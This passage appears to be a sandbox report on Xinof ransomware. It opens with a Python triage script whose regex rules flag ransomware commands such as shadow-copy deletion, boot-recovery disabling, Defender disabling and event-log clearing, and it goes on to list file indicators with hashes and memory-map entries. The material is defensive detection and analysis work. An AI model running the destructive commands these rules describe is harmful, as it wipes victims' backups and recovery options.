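    ("persistence:scheduled_task",
     re.compile(r'\bschtasks\b.*/create', re.I)),
    ("persistence:run_key",
     re.compile(r'\breg\s+add\b.*\\CurrentVersion\\Run(Once)?\\?\s', re.I)),
    ("defense_evasion:defender_disabled",
     re.compile(r'DisableAntiSpyware\s+/t\s+REG_DWORD\s+/d\s+1', re.I)),
    ("defense_evasion:taskmgr_disabled",
     re.compile(r'DisableTaskMgr\s+/t\s+REG_DWORD\s+/d\s+1', re.I)),
    ("defense_evasion:safeboot_keys_deleted",
     re.compile(r'\breg\s+delete\b.*\\Control\\SafeBoot\b', re.I)),
    ("defense_evasion:event_logs_cleared",
     re.compile(r'\bwevtutil(\.exe)?\s+cl\b', re.I)),
    ("impact:acl_everyone_full",
     re.compile(r'\bicacls\b.*/grant\s+Everyone:', re.I)),
    ("impact:shadow_copies_deleted",
     re.compile(r'\bvssadmin\b.*\bdelete\s+shadows\b|\bwmic\b.*\bshadowcopy\s+delete\b', re.I)),
    # bcdedit: match the values, not the option names, because the captured
    # command spells "bootstatuspolicy" as "boostatuspolicy".
    ("impact:boot_recovery_disabled",
     re.compile(r'\bbcdedit\b.*/set\b.*\b(ignoreallfailures|recoveryenabled\s+no)\b', re.I)),
    ("impact:backup_catalog_deleted",
     re.compile(r'\bwbadmin\b.*\bdelete\s+catalog\b', re.I)),
    ("impact:system_restore_disabled",
     re.compile(r'\\SystemRestore\s+/v\s+Disable(SR|Config)\b', re.I)),
    ("impact:volume_relabeled",
     re.compile(r'^\s*label\s+[A-Z]:\s+\S+', re.I)),
]


def classify(cmdline):
    """Return the sorted list of behaviour tags that one command line triggers."""
    return sorted(tag for tag, pattern in RULES if pattern.search(cmdline))


def triage(cmdlines):
    """Group command lines by tag; lines matching no rule go under 'unclassified'."""
    grouped = defaultdict(list)
    for cmd in cmdlines:
        for tag in classify(cmd) or ["unclassified"]:
            grouped[tag].append(cmd)
    return dict(grouped)


def recovery_inhibited(cmdlines):
    """True when one run both removed shadow copies and turned off boot recovery.
    Either alone has benign explanations; together they are the ransomware tell."""
    seen = {tag for cmd in cmdlines for tag in classify(cmd)}
    return {"impact:shadow_copies_deleted", "impact:boot_recovery_disabled"} <= seen


if __name__ == "__main__":
    for tag, cmds in sorted(triage(CAPTURED).items()):
        print(f"{tag} ({len(cmds)})")
        for cmd in cmds:
            print("   ", cmd)
    print("recovery inhibited:", recovery_inhibited(CAPTURED))
```

The "unclassified" bucket is deliberate: the ping to localhost.com is the batch file's sleep idiom and carries no signal by itself, and a triage that silently drops unmatched lines hides exactly the commands that will need a new rule next time.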
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5: ed777d6bf2f684da1f71bdf0416a0d0b
SHA1: ab063f4f66c16b45733ce8970a7dd0092bdc5aa1
SHA256: 845195c056090e889523d78541c05b45e3b955609320575bf12fec1d609802cc
SHA512: 116ff58e11ab0832ec37528fa258252cf10b683a9def4d613e89995f05930caac3b07527f6f2568696c8d030207296f9c3603cb41fe84b323235a859d504327e
-
C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5: 656bdccc20db3f839533b85bc65a6988
SHA1: d89780ab6609f2b2ec78a39ba202ea406f386438
SHA256: 6379b61717c683b70462ce36bd2cf23bd5d8a7997e4526c422ac349c527b3acf
SHA512: 93f1865d87c5654b5864219549a9b0172f12754ca197c9d66603f045f7b1018bcfdf4a0670a04546e0708873e0d06069442f9da1f4548ab51ed49899592a25d2
-
C:\ProgramData\SystemID
MD5: e0e278def32f4826b7b73356857940ef
SHA1: a08798fe621b7a1b1add98693d9c32acedf00ad7
SHA256: 1177767437d1fb1878fe187fdfb9edd617d9e4027adb2d96b5f04669680584e7
SHA512: 08c7b74c4cbbf5ec7bac039f407735c48446f685bc539a297c534f134c73347e33982d0741e9b7f6111aee88ff4aa93948af50c0f0950706aa61c7827f70fe37
-
C:\Users\Admin\AppData\Local\Temp\Cpriv.key
MD5: a02686eda834b2bf10beb7bde11bee5b
SHA1: 1172e76fcc6628d80fda1ce84641dbc557f2a314
SHA256: a493df2e095ef8334998b2ac782872d3fb86d41bad48708055684f82745a1b35
SHA512: 928ef05587071368428589a6d35fe4304b9f8c9845cd9ab24fa9d60f4b175d14aacd78965bea11520ae611b85a59df80751063a142ac2860a04304125f4d1496
-
C:\Users\Admin\AppData\Local\Temp\Cpub.key
MD5: 17c81203ef0e18628d6e497a5681c76d
SHA1: b0274ec1d0bc98b735959e958044d933360ec2e6
SHA256: dc8cb15f68761b3b7e5409bef47c426ae36b4798d4a44dd7ba983e5a321a7f06
SHA512: a60216417fe807ec25f72aea03424452be89fa9b02c0ad742faeaae7fa37b84155bc256d93694082fa6f780875476df4bde8aa4de08ceb3a80e06070f8083606
-
C:\Users\Admin\AppData\Local\Temp\FXSAPIDebugLogFile.txt
MD5: 03b43bfddb48c9b8fbb8910c582f2428
SHA1: 7efd598b42dfa8ca174e04a1f5c879e9e7a78190
SHA256: 789712583a510f2c46b8fb1f7b0ec52d55d0d68b5849466f9f42680e0af2bed5
SHA512: 76958a8d05654064ec10a3431e1581f1f61c694f6a0984edb26b21bcb7cbc60023887df4ac48ef9c33a6c844f4264e44c1b60fc85b7b34e86ba4d1b92538df73
-
C:\Users\Admin\AppData\Local\Temp\How To Decrypt Files.hta
MD5: f8de7da291b7fac4053eff9ba8b68ef0
SHA1: 47f2550dd4ebc56f167e1335ff5ec2f9100f863c
SHA256: 95e7ee01826ac22110c8966c634d772037ec25b1fd7c8a01bf1cf48dc154e998
SHA512: 0e759a54c9396a94ecacffdcec1b98f4f4264b815d0306f5f20d2e7c7cd7fac52e0f6c78d237da5c15fb1bcc4aa11cf18ff8f9a94c4adaf70811f0d9daf19e53
-
C:\Users\Admin\AppData\Local\Temp\SystemID
MD5: e0e278def32f4826b7b73356857940ef
SHA1: a08798fe621b7a1b1add98693d9c32acedf00ad7
SHA256: 1177767437d1fb1878fe187fdfb9edd617d9e4027adb2d96b5f04669680584e7
SHA512: 08c7b74c4cbbf5ec7bac039f407735c48446f685bc539a297c534f134c73347e33982d0741e9b7f6111aee88ff4aa93948af50c0f0950706aa61c7827f70fe37
-
C:\Users\Admin\AppData\Local\Temp\WPDNSE\Cpriv.key
MD5: a02686eda834b2bf10beb7bde11bee5b
SHA1: 1172e76fcc6628d80fda1ce84641dbc557f2a314
SHA256: a493df2e095ef8334998b2ac782872d3fb86d41bad48708055684f82745a1b35
SHA512: 928ef05587071368428589a6d35fe4304b9f8c9845cd9ab24fa9d60f4b175d14aacd78965bea11520ae611b85a59df80751063a142ac2860a04304125f4d1496
-
C:\Users\Admin\AppData\Local\Temp\WPDNSE\Help.txt
MD5: c7199085c9ebf2e72ad6c5df57edf185
SHA1: ea7c6b15b2fee5ef95658ad68d62624741c9b7ef
SHA256: 83a3ac21cfcc6069d0e4f01acb3d528ab80cec04e87e5106ef571fe8d8872636
SHA512: 057730155bfdb9d46bc60f68a22c6a88594fe43a8be455c719f1ccafcf790a89f5bf1ff1e9c22db19c89ef23fd31843f1e5f1d67e7aa54c262f3d65cc8a8c5c9
-
C:\Users\Admin\AppData\Local\Temp\WPDNSE\How To Decrypt Files.hta
MD5: f8de7da291b7fac4053eff9ba8b68ef0
SHA1: 47f2550dd4ebc56f167e1335ff5ec2f9100f863c
SHA256: 95e7ee01826ac22110c8966c634d772037ec25b1fd7c8a01bf1cf48dc154e998
SHA512: 0e759a54c9396a94ecacffdcec1b98f4f4264b815d0306f5f20d2e7c7cd7fac52e0f6c78d237da5c15fb1bcc4aa11cf18ff8f9a94c4adaf70811f0d9daf19e53
-
C:\Users\Admin\AppData\Local\Temp\XinofSetup.bat
MD5: e87b92b6fa7ff1c853199790b082024d
SHA1: 63fe98f296ca56bd39c21fe1fce61586cfaf78a2
SHA256: ede85eb58f52473dafe94d6911d56c4d3a23ead97753359941bd8413995fa6c5
SHA512: 3b51a2cceed74e8a111c473c5153220169b4fd8d17f6767b471f9b0d7cb09e6d111567bbf666ad22a28ddb62dd2b4ef28c25781dbcf0a7e1b75a36e6bbeef634
-
C:\Users\Admin\Desktop\CompareUnpublish.wma.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5: a012cd308847fd7aa09afe8a3ec5fbab
SHA1: aacc8ffcf664e62c22837b6712b9c3c9aa76a906
SHA256: c8e95421b72ad5dc835d3b7fbe959181416d6e895c2dfa9e4381352f7f5f3384
SHA512: 3c90d9411c9edf585b102e16edf02294083384dd86c17252fefca0c6a573b72b9334c94a9966018d828ef55ddd944413440c20a2ecc0c0a596252a3d2c395049
-
C:\Users\Admin\Desktop\Cpriv.key
MD5: a02686eda834b2bf10beb7bde11bee5b
SHA1: 1172e76fcc6628d80fda1ce84641dbc557f2a314
SHA256: a493df2e095ef8334998b2ac782872d3fb86d41bad48708055684f82745a1b35
SHA512: 928ef05587071368428589a6d35fe4304b9f8c9845cd9ab24fa9d60f4b175d14aacd78965bea11520ae611b85a59df80751063a142ac2860a04304125f4d1496
-
C:\Users\Admin\Desktop\DisconnectAdd.ttc.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5: 688085a04d564714efc6281cdbaf76de
SHA1: c75fcfb3072e928e1669bf2d84a0e2a931970e43
SHA256: a08b3457be49a375514958c84ee6cd08704afe85051642098f8af94a37f70176
SHA512: 4c102ececded3e951024d19cbe94e61c18c4c3a6edee72079ab4d0d2ed43c9c264ea9458ce47c2f56592af5b66e7de2a591ee46e87f5d29d30bbff3b75a2e157
-
C:\Users\Admin\Desktop\DisconnectStep.csv.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5: 8b8f0c341c3bb9448548558a3608d537
SHA1: 32c867e6b903447c5460e8110322b7eff5b3425c
SHA256: 18d40c4de860f248b781b70ae48897870fce434d7e0d40b50737b6f77b025704
SHA512: ea2fb27080c49e48abe7e17a1186d9bfd9320317e2f0af91666750e1cb9b3e6a958b0edf5399bbf72974d332e50509571f35d7ff78b4424138b42b6593d36e99
-
C:\Users\Admin\Desktop\ExpandResume.clr.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5: 756d2ba7f8c462340fa9ab1e4c9085bf
SHA1: c99aace2f8d248a495943a0992fee762c79e32e0
SHA256: 41576cbe60aa0e5a9a21434d1f670288ca9dcae211dbec2f8a9985e037234dff
SHA512: 7ba4b54ca4f9806e2f2d3b56f8cfec16eb84d66477fabc1394a564d6ae650af5f84306dc2b21b1c2a219f206f21de9b4e5f13195121c2e09b8d45853de24482a
-
C:\Users\Admin\Desktop\ExpandSearch.vsx.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5: 86cccdc9a9a405e35bc2c3a6401c9f0d
SHA1: b530f88eff5f35f112c5990c7d58e498776dbcfc
SHA256: c5884e02c3e52ed03e7aa6dd634eb3808f75ad6adf2231cf4ddb8067de5069d7
SHA512: 96c277da99631c4d129039b841b64d747235c3f33ff62da28eee952ed029e552325ca46ad43f528e7b75705eb9174bfce1a19e91abf0561f1054fcced25d7318
-
C:\Users\Admin\Desktop\GroupOpen.vsd.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5: 4c5534d39a6112c25cbde1d72106eecc
SHA1: 0ee889eb6c776d64b663835188688868051167de
SHA256: 74a4ed4dd1ae1f7938a73cf79e05cd47799f81b36652c81ebeb340764d019c76
SHA512: ed39d57302ed0c5a79613201dd65bafa88568f39983caac974e3c2021c998413dc3f4e6d8b5e8f5803f1a65d1059c4b5702fa329be66144ee407471a434c1f3b
-
C:\Users\Admin\Desktop\Help.txt
MD5: c7199085c9ebf2e72ad6c5df57edf185
SHA1: ea7c6b15b2fee5ef95658ad68d62624741c9b7ef
SHA256: 83a3ac21cfcc6069d0e4f01acb3d528ab80cec04e87e5106ef571fe8d8872636
SHA512: 057730155bfdb9d46bc60f68a22c6a88594fe43a8be455c719f1ccafcf790a89f5bf1ff1e9c22db19c89ef23fd31843f1e5f1d67e7aa54c262f3d65cc8a8c5c9
-
C:\Users\Admin\Desktop\How To Decrypt Files.hta
MD5: f8de7da291b7fac4053eff9ba8b68ef0
SHA1: 47f2550dd4ebc56f167e1335ff5ec2f9100f863c
SHA256: 95e7ee01826ac22110c8966c634d772037ec25b1fd7c8a01bf1cf48dc154e998
SHA512: 0e759a54c9396a94ecacffdcec1b98f4f4264b815d0306f5f20d2e7c7cd7fac52e0f6c78d237da5c15fb1bcc4aa11cf18ff8f9a94c4adaf70811f0d9daf19e53
-
C:\Users\Admin\Desktop\JoinPing.css.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5: b47773e65359d3d65b9b8d562492ed1b
SHA1: 079b9f7021b03ca4bd90e944fe5cb1a0bc19e1b0
SHA256: 4a6b9157f0938c4919fe4d6f207a1f89551c9a8d4cf2df575a4436549ae30c60
SHA512: 59cba896ebd23c69fbf47662f857c2d26872a195cbba3b4ed94a2200565bb2db6ef9f8696e3151ff81703e26dbea624a8144027f984553b160eb2d87fd2756cf
-
C:\Users\Admin\Desktop\LockEdit.reg.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5: c482f5912b956d3ae8d8d99e8782be90
SHA1: 91fbf5c7dfc93f9be2e5d3cd18209fe8d9c13e9c
SHA256: 024ff162a3442fec9899ae3aac985a199711a3aaa648aca74b8356ef7f5cb16e
SHA512: 787abc61d2b78bc03041c3dce564a6dfdf2420ffb46425a20dfbcbcee897fbfb322d5641dafee01ddb8e44f88e3c9b71253abfee3029ccee3375120ca73ea7fb
-
C:\Users\Admin\Desktop\MeasureAdd.raw.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5: 02dfe570774e015d104b1d6692ceee87
SHA1: f4a374d9b49b3d96f8544b73be815696eed81b66
SHA256: e7c2afdcb7b432014eae7a1d0cd7640de8ed337a93ed0a50d220bb478b71ceef
SHA512: 69128ff98549b0e620cb271556130e4241ca8a3e439ff0409615911ef725e7880cb800d167e3dc3671689639a2da3f2384126691a3d976a072ad9a3d4182a647
-
C:\Users\Admin\Desktop\MeasureDisconnect.wmv.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5: 4666789d048657e21f78cc3250a31fea
SHA1: f2f5da9bfc4ee3fee3bc5d5b969f5e6e4b749ad0
SHA256: 59bb17c27ff72e32eb0ed1e20bcbfea1a48c456f619cb8a8f15191c4af958a55
SHA512: 2f6cc9caaf8478e851e113b01a0046f90f566ab4d4991087f1555db5791f217b08ee854b446ece320d1a24d0d815e6546665cc20fe2987548c5d5bac3a27903a
-
C:\Users\Admin\Desktop\MergeDeny.vb.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5: 2a080598ad9875ae1a34c4fd97f49838
SHA1: 9831f03acd8d8b3ea4842ffcb0c59188f1a55da7
SHA256: 7b520e701bb87c76c9a69837fd98dfce5f6d76c5e0fd88b8c28ec52b4eed6978
SHA512: 3e5f8aeca6dbfd898d62bbdb6163a8c4a23fbeae96c47159a6424ab6451be45b4307b337be7f20b3d2713814b8e9c18ca5906028af6c26767201444802b4ee98
-
C:\Users\Admin\Desktop\MountApprove.mp4.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5: 7a75e9d18126d883216bd49ac253af48
SHA1: 49dd7909e1570d156a97d4bda8f099b48a5391b5
SHA256: aae4985ea2fcaed80852d9b3a4b6f8e4b7d811b607097efbf5ff0f2488cf6e52
SHA512: afdd0619063f53da4051437ba2ec7ac9f8e8c142f8686229acac93b93bf609fce34009e94a4d08465034baf2fd1ab1fc9ca420fe5151478ed96fa1591ef61fe7
-
C:\Users\Admin\Desktop\MoveStop.js.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5: f408acde990ce3beeeed2da8f9c2ae27
SHA1: 192d61a49acdb5927f1dcac97a802d3cb682f1ca
SHA256: 1cbdbe8806a2018f65d9318840b76179a1b406e29cc041834678e221be712f02
SHA512: 5ac81198b04a71387eaa86c8ef88020137b0412c60a8f9ab62394622687e7e3c264c57da009506752e831c1cfc69664e35e04f1382a61fdb1a31c68c3b478407
-
C:\Users\Admin\Desktop\ProtectApprove.3gp2.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5: 99f27d3913fda7de72277099eef727b3
SHA1: 6295184382e9c28df30c1d7fcd0c5cbb20000cff
SHA256: 6011c82ee49c8f35a2c76b4bff0f06197fb6d559929c1d963840897da21997db
SHA512: 96e0f3c4b1afc4277e8c577c051a22e553962967498fe9d2721f442ef6ed1016325cff45c47a71629692f1715998d7aa89db4768a97eac3e82dd93f7530e429e
-
C:\Users\Admin\Desktop\RepairGrant.pptm.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOF
MD5: 1439602f8050817c48d30452fed669ac
SHA1: b512e349bd8e56f218d51b3b3b362fedd4940c1f
SHA256: cf1f2eb0a5d668260f415546cf2a042697da5335d09a2ab34f377a00ddfdd432
SHA512: 89c283ee1540349d5459a22288c09215289e00855d8606ebe16a39617698adf31c81a480987780ef9d93475ca64beaeb87699173f6f96e7378eb8305fe6a16e1
-
C:\Users\Admin\Desktop\ResetAdd.mpv2.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
a27b86c0f9080f73966e9d7c74b77b62
SHA1c00215a3886db6fd6a9d47c64187ebe34931465f
SHA256c06b29da6e7f26719d04746ebc284d257119833d0eb3c5c89f39885aec5ac635
SHA51213fd06f6cb0ef1766e556e80be4754175c6b0dd7b52ddd16fa5cbf4bc34312a17cceb819f698dcf227d75af3053791918f75a1c02726659d8d67f4ec2ba3b816
-
C:\Users\Admin\Desktop\ResetMeasure.3g2.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
bcb5a742503a0c6a367ce0dbf3f6f318
SHA1f74d633602c9f4903f05f572095b8c0e8403b64a
SHA256adaf00e92a1e2d6fdcc4f635b69818f3375fbb9f1b257feed29d3db83b5fb8b3
SHA512b129aa8a9c99756be9dc30754ee378931b9d488d3aed6cec0c87f74e8e1799d3729d275978a754bae645e18244152c032647a3ce7b685c94655038ac0f78b091
-
C:\Users\Admin\Desktop\RevokeUnlock.mpg.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
a04495f9bb81d37ee9a00f5b68d90209
SHA12607e698fbd5d63114abd5833b51e4e0af3bb17b
SHA256618d2ff1aa8fb429bf5e1b00c1df12fe5ef1c3842c7fd01fe9396ea505235dd3
SHA512219ecb403230adebbf437171e684633c6b9720664a5a2e7d6731aea736761794c79a3c089fd386120176cc1ec2fea2733651105544e4f3fcfa073fc93f121d55
-
C:\Users\Admin\Desktop\ShowUnprotect.contact.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
17cfd7e1d30289bd1ca9664415841316
SHA17331dbc587508ffe025679ba021da09fe9c99789
SHA2562da64e07f49d53d722c9cdd6c95869e65e110324f6e88261c8a7e9300bac08b3
SHA5127fd9799ebde7e93e9ab08370e883feae78b2605ced89adbccc256454a9ceab87c00959914359b2b856ece555ee7402e53e264ba35b374062edfe8cf87092ad1a
-
C:\Users\Admin\Desktop\StartSelect.exe.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
a1e472741b494bac5ffa034b6f5a3116
SHA1842c65869d676c860762976d7b733cbbac8423f8
SHA2560fd02cd2062297a48edaca62cb42de18e3a0d5237245c836157ddb476f9051e1
SHA51211bf7f5ab37fe32200f114ac5b77ccbdf3230571ced4d617e206a903f2754a15ba822c0ec15b2e43cdb0a271ab9f8a8e7a97a8aa117ee2c2e28c6928631376da
-
C:\Users\Admin\Desktop\SubmitPublish.raw.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
00c3632b2aef1f6d7d66e69519b37197
SHA19a79164cdb8a403645b7ba3e491c6609dfd95ecb
SHA2562f8f122628a04221fb4afdcf62081de2b57b89c386b5f2404bc7b4a2f4bd7339
SHA512a289567b649b6e312005dad84db0298452ec31a3df474f898e56f3ad42d7723d69bd27c0971e3362f25402f0a172b390a2c2033bfb782ea8e01444c1315e7c6e
-
C:\Users\Admin\Desktop\SubmitRepair.nfo.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
e188995a877bfcb3d3b59c3dc1da9823
SHA1cb102250ef0692b269e44eaa283bc49ce4aabd38
SHA2567ce5e21c21fd24a064761e7f11c4ec0e58bef0baf064b52eaf3145f027317994
SHA512f49133d4570595f400397e52715d32bd02981a2980ec9c55e1b616aa0ed1aa3d7d31eae61c1be6bbdd18bdec225282e82cdfcbbfea7acac3b8eac958c0ba8812
-
C:\Users\Public\Desktop\Adobe Reader 9.lnk.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
915edd10651240864f54b493e5f5880c
SHA1e53d857d71b3814dfd31ac7caf71547d88e81f94
SHA25602c6d916e42b1cc6ae04ab02374f59eaf063c83194b6058931e1ac82161c9dcd
SHA512049b747deddbd55cc19cf953e277a316444f917dcc06fde56d33838c3266d22f8af4c8924fc0cdb3dd760f9e1d5f67c55e9dde9c69aa5c1c085e49a7992d9e72
-
C:\Users\Public\Desktop\Cpriv.keyMD5
a02686eda834b2bf10beb7bde11bee5b
SHA11172e76fcc6628d80fda1ce84641dbc557f2a314
SHA256a493df2e095ef8334998b2ac782872d3fb86d41bad48708055684f82745a1b35
SHA512928ef05587071368428589a6d35fe4304b9f8c9845cd9ab24fa9d60f4b175d14aacd78965bea11520ae611b85a59df80751063a142ac2860a04304125f4d1496
-
C:\Users\Public\Desktop\Firefox.lnk.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
834a21dac3a51b0f192a6614f625c3af
SHA12a1e00815376b2d79ac2e480f5c4fd1c94ecb7e5
SHA25674a23f87bdb64bd9d1c06a262c0db7921a395bdf7f7d129134464764a068399f
SHA5126777ffec58ffb1915af3f3a24e6b8696b641d52e0295c02dfae443ab86f861f40ef17e107ae0de59e927564ad64c749259b25394ceec493cfbcc9d05e482cdf1
-
C:\Users\Public\Desktop\Google Chrome.lnk.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
04ad26376bd169a6243a05ed1782c16b
SHA1065046d56efcf5c1964b47c4eb4309a8b085e336
SHA2565956eda2ef20925375e48f7f4546333ee5ba4ea33402e82cfebda1fc54ae3b63
SHA5128c23c3c6899521bb6e3cc2ba6592a24d9510e49a6ee0df80771edc944988272f1e4288b6d5a9c2dadfa1f9a693d65ad9db7c455c46990b2621172be3f03f93c3
-
C:\Users\Public\Desktop\Help.txtMD5
c7199085c9ebf2e72ad6c5df57edf185
SHA1ea7c6b15b2fee5ef95658ad68d62624741c9b7ef
SHA25683a3ac21cfcc6069d0e4f01acb3d528ab80cec04e87e5106ef571fe8d8872636
SHA512057730155bfdb9d46bc60f68a22c6a88594fe43a8be455c719f1ccafcf790a89f5bf1ff1e9c22db19c89ef23fd31843f1e5f1d67e7aa54c262f3d65cc8a8c5c9
-
C:\Users\Public\Desktop\How To Decrypt Files.htaMD5
f8de7da291b7fac4053eff9ba8b68ef0
SHA147f2550dd4ebc56f167e1335ff5ec2f9100f863c
SHA25695e7ee01826ac22110c8966c634d772037ec25b1fd7c8a01bf1cf48dc154e998
SHA5120e759a54c9396a94ecacffdcec1b98f4f4264b815d0306f5f20d2e7c7cd7fac52e0f6c78d237da5c15fb1bcc4aa11cf18ff8f9a94c4adaf70811f0d9daf19e53
-
C:\Users\Public\Desktop\VLC media player.lnk.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
4a625f667a5a7e7b895e6d3652123242
SHA18d96d38b83e249b85f8c9486602085a4c0c82ce4
SHA256202b8e318f66aadbc53f64e52414d0a8d462ed8473a8636f392360f6f955595c
SHA512d455149a5d427e9aa84e498e375d2721ecb7d4ab9458cb65605a7cb89322619e7c221865c06c24326978d59fd3298a27db50329b11964c057ca647692476848f
-
memory/108-216-0x0000000000000000-mapping.dmp
-
memory/112-2-0x0000000000000000-mapping.dmp
-
memory/208-329-0x0000000000000000-mapping.dmp
-
memory/220-330-0x0000000000000000-mapping.dmp
-
memory/232-331-0x0000000000000000-mapping.dmp
-
memory/292-170-0x0000000000000000-mapping.dmp
-
memory/296-215-0x0000000000000000-mapping.dmp
-
memory/296-178-0x0000000000000000-mapping.dmp
-
memory/316-156-0x00000000029E0000-0x00000000029F1000-memory.dmp
Filesize
68KB
-
memory/316-155-0x00000000029E0000-0x00000000029F1000-memory.dmp
Filesize
68KB
-
memory/316-154-0x0000000001EC0000-0x0000000001ED1000-memory.dmp
Filesize
68KB
-
memory/316-306-0x0000000000000000-mapping.dmp
-
memory/388-1-0x0000000000000000-mapping.dmp
-
memory/432-300-0x0000000000000000-mapping.dmp
-
memory/432-213-0x0000000000000000-mapping.dmp
-
memory/548-174-0x0000000000000000-mapping.dmp
-
memory/568-238-0x0000000000000000-mapping.dmp
-
memory/568-173-0x0000000000000000-mapping.dmp
-
memory/576-288-0x0000000000000000-mapping.dmp
-
memory/576-203-0x0000000000000000-mapping.dmp
-
memory/592-325-0x0000000000000000-mapping.dmp
-
memory/612-352-0x0000000000000000-mapping.dmp
-
memory/612-158-0x0000000000000000-mapping.dmp
-
memory/620-323-0x0000000000000000-mapping.dmp
-
memory/656-225-0x0000000000000000-mapping.dmp
-
memory/656-319-0x0000000000000000-mapping.dmp
-
memory/656-192-0x0000000000000000-mapping.dmp
-
memory/680-169-0x0000000000000000-mapping.dmp
-
memory/732-224-0x0000000000000000-mapping.dmp
-
memory/736-3-0x0000000000000000-mapping.dmp
-
memory/736-333-0x0000000000000000-mapping.dmp
-
memory/740-334-0x0000000000000000-mapping.dmp
-
memory/740-162-0x0000000000000000-mapping.dmp
-
memory/788-191-0x0000000000000000-mapping.dmp
-
memory/788-313-0x0000000000000000-mapping.dmp
-
memory/788-223-0x0000000000000000-mapping.dmp
-
memory/808-239-0x0000000000000000-mapping.dmp
-
memory/808-175-0x0000000000000000-mapping.dmp
-
memory/812-354-0x0000000000000000-mapping.dmp
-
memory/820-180-0x0000000000000000-mapping.dmp
-
memory/820-217-0x0000000000000000-mapping.dmp
-
memory/844-171-0x0000000000000000-mapping.dmp
-
memory/852-312-0x0000000000000000-mapping.dmp
-
memory/868-205-0x0000000000000000-mapping.dmp
-
memory/868-322-0x0000000000000000-mapping.dmp
-
memory/904-351-0x0000000000000000-mapping.dmp
-
memory/916-278-0x0000000000000000-mapping.dmp
-
memory/924-188-0x0000000000000000-mapping.dmp
-
memory/1016-0-0x0000000000000000-mapping.dmp
-
memory/1028-332-0x0000000000000000-mapping.dmp
-
memory/1032-6-0x0000000000000000-mapping.dmp
-
memory/1032-275-0x0000000000000000-mapping.dmp
-
memory/1036-5-0x0000000000000000-mapping.dmp
-
memory/1060-221-0x0000000000000000-mapping.dmp
-
memory/1108-294-0x0000000000000000-mapping.dmp
-
memory/1112-4-0x0000000000000000-mapping.dmp
-
memory/1112-194-0x0000000000000000-mapping.dmp
-
memory/1120-289-0x0000000000000000-mapping.dmp
-
memory/1136-237-0x0000000000000000-mapping.dmp
-
memory/1136-202-0x0000000000000000-mapping.dmp
-
memory/1148-206-0x0000000000000000-mapping.dmp
-
memory/1156-232-0x0000000002B00000-0x0000000002B01000-memory.dmp
Filesize
4KB
-
memory/1156-227-0x0000000002B00000-0x0000000002B01000-memory.dmp
Filesize
4KB
-
memory/1156-231-0x0000000002A90000-0x0000000002A91000-memory.dmp
Filesize
4KB
-
memory/1156-183-0x0000000000000000-mapping.dmp
-
memory/1156-218-0x0000000000000000-mapping.dmp
-
memory/1212-214-0x0000000000000000-mapping.dmp
-
memory/1212-295-0x0000000000000000-mapping.dmp
-
memory/1212-328-0x0000000000000000-mapping.dmp
-
memory/1228-308-0x0000000000000000-mapping.dmp
-
memory/1248-211-0x0000000000000000-mapping.dmp
-
memory/1256-336-0x0000000000000000-mapping.dmp
-
memory/1264-321-0x0000000000000000-mapping.dmp
-
memory/1276-189-0x0000000000000000-mapping.dmp
-
memory/1296-10-0x0000000000000000-mapping.dmp
-
memory/1296-163-0x0000000000000000-mapping.dmp
-
memory/1328-297-0x0000000000000000-mapping.dmp
-
memory/1332-220-0x0000000000000000-mapping.dmp
-
memory/1340-201-0x0000000000000000-mapping.dmp
-
memory/1340-150-0x0000000000000000-mapping.dmp
-
memory/1340-290-0x0000000000000000-mapping.dmp
-
memory/1340-236-0x0000000000000000-mapping.dmp
-
memory/1340-324-0x0000000000000000-mapping.dmp
-
memory/1352-302-0x0000000000000000-mapping.dmp
-
memory/1352-179-0x0000000000000000-mapping.dmp
-
memory/1356-207-0x0000000000000000-mapping.dmp
-
memory/1376-285-0x0000000000000000-mapping.dmp
-
memory/1376-17-0x0000000000000000-mapping.dmp
-
memory/1384-139-0x0000000000000000-mapping.dmp
-
memory/1384-282-0x0000000000000000-mapping.dmp
-
memory/1388-187-0x0000000000000000-mapping.dmp
-
memory/1388-309-0x0000000000000000-mapping.dmp
-
memory/1388-277-0x0000000000000000-mapping.dmp
-
memory/1408-210-0x0000000000000000-mapping.dmp
-
memory/1416-298-0x0000000000000000-mapping.dmp
-
memory/1428-301-0x0000000000000000-mapping.dmp
-
memory/1432-299-0x0000000000000000-mapping.dmp
-
memory/1436-342-0x0000000000000000-mapping.dmp
-
memory/1444-338-0x0000000000000000-mapping.dmp
-
memory/1448-307-0x0000000000000000-mapping.dmp
-
memory/1456-176-0x0000000000000000-mapping.dmp
-
memory/1468-337-0x0000000000000000-mapping.dmp
-
